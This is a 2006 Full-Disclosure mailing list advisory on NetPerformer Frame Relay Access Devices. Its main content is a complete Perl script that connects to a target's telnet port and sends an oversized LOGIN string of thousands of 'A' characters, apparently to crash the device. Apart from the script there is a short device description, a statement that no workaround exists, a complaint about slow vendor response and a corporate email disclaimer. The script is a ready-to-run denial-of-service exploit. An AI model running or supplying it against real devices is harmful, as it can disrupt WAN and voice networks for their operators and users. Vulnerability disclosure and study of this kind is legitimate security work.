NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities
.<=[ Arif Jatmoko ]=>.
Release Date : 8 July 2006
Product Affected :
Web Site :
www.netperformer.com
=.[DESCRIPTION].=
NetPerformer Frame Relay Access Device (FRAD) is switching & routing device
that support Ethernet and SNA protocols, Voice, etc. This device mainly
used for connecting distributed WAN network through frame relay or ATM
network.
=.[DETAILS].=
==================================
00.^.00==================================
#!/usr/bin/perl
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "23",
Proto => "TCP"))
{
print "Modhiar'000 … killing netperformer … $ARGV[0]
port 23…";
sleep(1);
print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
sleep(1);
print $socket "PASS " . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:23\n";
}
==================================
00.^.00==================================
WORKAROUND
No Workaround yet for this vulnerability.
Vendor Response Status :
Vendor response very slow since discovered the above vulnerabilities.
Arif Jatmoko //=.
Information System Security Officer
Coca-Cola Bottling Indonesia
Visit us at www.coca-colabottling.co.id
CAUTION:
This message may contain privileged and confidential information intended only for the use of the addressee named above. If you are not the intended recipient of this message, you are hereby notified that any use, dissemination,distribution, or reproduction of this message is prohibited. If you have received this message in error, please notify Coca-Cola Bottling Indonesia immediately. Any views expressed in this message are those of the individual sender and may not necessarily reflect the views of Coca-Cola Bottling Indonesia.
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/